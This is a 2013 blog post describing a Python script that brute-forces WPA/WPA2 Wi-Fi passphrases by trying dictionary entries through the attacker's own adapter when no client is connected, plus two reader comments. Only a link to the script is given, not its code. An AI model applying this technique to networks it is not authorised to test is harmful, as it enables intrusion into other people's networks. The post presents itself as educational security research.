Thursday, December 26, 2013

WPA Brute-Forcer

The purpose of me writing this Python script is to show that without having a client connected to a WPA/WPA2 Access Point, we still can crack the passphrase.
In order for the application to work, WPA Supplicant and Python must be install on the Linux system.
I have tested it on  Kali-Linux and it works fine.

I have heard from many people that without a "Client", we are unable to crack a WPA passphrase. It is partially true.

Yes, indeed without a client connected to a WPA/WPA2 encrypted access point, we are unable to get a 4-ways handshake for cracking the passphrase with Aircrack-NG. But, we can still attempt to crack the WPA/WPA2 by using our wirelesss adapter as a client to try to connect to the target access point with different passphrase.

The theory is simple...
 - we are not trying to get a 4 way handshake since there is no client connected to the access point.
 - we will use dictionary attack on the access point with the list of passphrase using our wireless adapter.

Note : Cracking is slow, but this is just to show that without a client connected to the target access point, we can still be able to crack a WPA/WPA2 access point.

Source code can be found at here
The script is written for educational purpose only. Testing are to be done in your own system.


2 comments:

Unknown said...

i tried it but it's not working...didn't recognized the pass

Anonymous said...

Ups link svn is unsubscribed, can you copy the code? Excellent work

https://code.google.com/p/syworks-pentesting/source/browse/wpa-bruteforce.py